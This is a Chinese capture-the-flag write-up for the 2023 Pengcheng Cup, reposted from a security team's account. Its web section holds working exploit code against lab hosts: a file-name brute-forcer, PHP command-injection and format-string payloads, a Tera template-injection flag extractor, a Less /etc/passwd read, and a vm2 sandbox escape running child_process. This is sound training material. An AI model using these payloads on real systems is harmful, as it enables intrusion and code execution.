2023鹏城杯 writeup by Mini-Venom

admin
admin
admin
138876
文章
114
评论
2023年11月8日09:46:06评论82 views字数 6276阅读20分55秒阅读模式

招新小广告CTF组诚招re、crypto、pwn、misc、合约方向的师傅,长期招新IOT+Car+工控+样本分析多个组招人有意向的师傅请联系邮箱

[email protected](带上简历和想加入的小组

Web

web2

源码有提示

<!-- backdoor_[a-f0-9]{16}.php -->

通过glob进行爆破
backdoor_00fbc51dcdf9eef767597fd26119a894.php

<?php
highlight_file(__FILE__);
error_reporting(0);

if(isset($_GET['username'])){
$sandbox = '/var/www/html/sandbox/'.md5("5050f6511ffb64e1914be4ca8b9d585c".$_GET['username']).'/';
mkdir($sandbox);
chdir($sandbox);

if(isset($_GET['title'])&&isset($_GET['data'])){
$data = $_GET['data'];
$title= $_GET['title'];
if (strlen($data)>5||strlen($title)>3){
die("no!no!no!");
}
file_put_contents($sandbox.$title,$data);

if (strlen(file_get_contents($title)) <= 10) {
system('php '.$sandbox.$title);
}
else{
system('rm '.$sandbox.$title);
die("no!no!no!");
}

}
else if (isset($_GET['reset'])) {
system('/bin/rm -rf ' . $sandbox);
}
}
?>

http://172.10.0.5/backdoor_00fbc51dcdf9eef767597fd26119a894.php?username=x&title=cat&data[]=%3C%3F%3D%60*%20%2F*%60%3B
数组绕+简短php

import requests

words = "abcdef0123456789"

burp0_url = "http://172.10.0.5:80/"
match_pattern = "glob://backdoor_"
for i in range(32):
for k in words:
match_pattern_tmp = match_pattern
match_pattern_tmp += k + "*.php"
burp0_data = {"filename": match_pattern_tmp}
result = requests.post(burp0_url, data=burp0_data)
if "yes" in result.text:
match_pattern += k
break
else:
continue
print(match_pattern)

# glob://backdoor_00fbc51dcdf9eef767597fd26119a894.php
"""
GET /backdoor_00fbc51dcdf9eef767597fd26119a894.php?username=jack&title[]=xxx&data[]=<?=`cat+/flag`?>
"""

flag{aa03a3c1-da05-4637-8b42-a8686aaf15bc}

web-escape

from sqlite3 import *

from random import choice
from hashlib import sha512

from flask import Flask, request, Response
from flask_limiter import Limiter
from flask_limiter.util import get_remote_address

app = Flask(__name__)
limiter = Limiter(
app=app,
key_func=get_remote_address,
default_limits=["50000 per hour"],
storage_uri="memory://",
)

salt = b'****************'
class PassHash(str):
def __str__(self):
return sha512(salt + self.encode()).hexdigest()

def __repr__(self):
return sha512(salt + self.encode()).hexdigest()
con = connect("users.db")
cur = con.cursor()
cur.execute("DROP TABLE IF EXISTS users")
cur.execute("CREATE TABLE users(username, passhash)")
passhash = PassHash(''.join(choice("0123456789") for _ in range(16)))
cur.execute(
"INSERT INTO users VALUES (?, ?)",
("admin", str(passhash))
)
con.commit()

@app.route('/source')
@limiter.limit("1/second")
def source():
return Response(open(__file__).read(), mimetype="text/plain")

@app.route('/')
@limiter.limit("3/second")
def index():
if 'username' not in request.args or 'password' not in request.args:
return open("index.html").read()
else:
username = request.args["username"]
new_pwd = PassHash(request.args["password"])
con = connect("users.db")
cur = con.cursor()
res = cur.execute(
"SELECT * from users WHERE username = ? AND passhash = ?",
(username, str(new_pwd))
)
if res.fetchone():
return open("secret.html").read()
return ("Sorry, we couldn't find a user '{user}' with password hash <code>{{passhash}}</code>!"
.format(user=username)
.format(passhash=new_pwd)
)

if __name__ == "__main__":
app.run('0.0.0.0', 10000)

sha512(salt)=ab160ee04d42a11490dba0abbdcdfcb5d36dd9cb06ee5115d8623c21b06abe7575abfcee2d754424be5bb0e81d037588539441073253f5a35132cb48f08e8f6c
原题
https://github.com/noflowpls101/CTFS_2023/blob/a78e5f759304a01415cb6b1f5113c2384b353e7f/ImaginaryCTF_2023/Web_Helpful/server.py

?username={passhash.str.globals}&password=123

salt:****************
passhash:72539d8e08a6d54ab659846b0c63cd3845a0dfd64f28f382b6746d37ea928c7adf48c8a49ddb33346f1c347223f4aae282e1111b7385f15fc9c99dcb5f9960bb

官网的原题 直接打就行

2023鹏城杯 writeup by Mini-Venom

{passhash.__str__.__globals__[app].wsgi_app.__globals__[os].environ}

Web-Tera

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @Author  : 
# @Time    : 2023/11/4 11:05
# @File    : Web-Tera.py
# @annotation    :
import requests

burp0_url = "http://172.10.0.3:8081/"
char_dict = "{-abcdefghijklmnopqrstuvwxyz0123456789}"
flag_string = ""
while True:
for i in char_dict:
single_char = flag_string + i
burp0_data = '''{% set a = "fla" %}
{% set a = "fla" ~ "g" %}
{% set b = get_env(name=a) %}
{% if b is starting_with(a~"TBD_FLAG") %}
True
{% endif %}'''
burp0_data = burp0_data.replace("TBD_FLAG", single_char)
result = requests.post(burp0_url, data=burp0_data, proxies={'http': 'http://127.0.0.1:8080'}).text
if "True" in result:
flag_string += i
print(flag_string)
break

rpc

.test {
  content: data-uri('/etc/passwd');
}

Less css任意文件读,读grpc服务端
eval.proto

syntax = "proto3";
package helloworld;
service Demo {
    rpc evalTemplate (TemplateRequest) returns (Reply) {};
}

message TemplateRequest {
string template = 1;
}

message Reply {
string message = 1;
}

rpc服务端

var PROTO_PATH = __dirname + '/eval.proto';
const {VM} = require("vm2");
var grpc = require('@grpc/grpc-js');
var protoLoader = require('@grpc/proto-loader');
var packageDefinition = protoLoader.loadSync(
    PROTO_PATH,
    {
        keepCase: true,
        longs: String,
        enums: String,
        defaults: true,
        oneofs: true
    });
var hello_proto = grpc.loadPackageDefinition(packageDefinition).helloworld;

function evalTemplate(call, callback) {
const vm = new VM();
callback(null, {message: vm.run(call.request.template) });
}

function main() {
var server = new grpc.Server();
server.addService(hello_proto.Demo.service, {evalTemplate: evalTemplate});
server.bindAsync('0.0.0.0:8082', grpc.ServerCredentials.createInsecure(), () => {
server.start();
});
}
main()

编写客户端直接打vm2即可

var PROTO_PATH = './eval.proto';
var grpc = require('@grpc/grpc-js');
var protoLoader = require('@grpc/proto-loader');
var packageDefinition = protoLoader.loadSync(PROTO_PATH,{
        keepCase: true,
        longs: String,
        enums: String,
        defaults: true,
        oneofs: true
    });
var hello_proto = grpc.loadPackageDefinition(packageDefinition).helloworld;

function main() {
var client = new hello_proto.Demo('172.10.0.6:8082', grpc.credentials.createInsecure())
client.evalTemplate({ template: 'const err = new Error(); err.name = { toString: new Proxy(() => "", {apply(target, thiz, args) { const process = args.constructor.constructor("return process")(); throw process.mainModule.require("child_process").execSync("/readflag").toString();},}), };try { err.stack; } catch (stdout) {stdout; }' }, function(err, response) {
if (err) {
console.error('Error: ', err)
} else {
console.log(response.message)
}
})
}

main()

WEB1

<?php
class H

{
    public $username;
    public function __destruct()
    {
        $this->welcome();

}
public function welcome()
{
echo "welcome~ ".$this->username;
}
}
class Hacker{

}

$h=new H();
$h->username = new Hacker();
echo serialize($h);

Reverse

安全编程

黑盒测试,对png头盲猜单字节异或,cyber爆破一下异或字节0x80,打开图片就行
flag{d846b8394630f42e02fef698a4e3df1b}

Misc

我的壁纸

Binwalk

2023鹏城杯 writeup by Mini-Venom

snow隐写,the password of snow is: snowday
f86361842eb8}
图片属性:passwd_is_7hR@1nB0w$&8;
然后steghide flag{b921323f-
Wav 是robot36隐写

2023鹏城杯 writeup by Mini-Venom

eaa2-4d62-ace6-
flag{b921323f-eaa2-4d62-

原文始发于微信公众号(ChaMd5安全团队):2023鹏城杯 writeup by Mini-Venom

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月8日09:46:06
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   2023鹏城杯 writeup by Mini-Venomhttps://cn-sec.com/archives/2186273.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息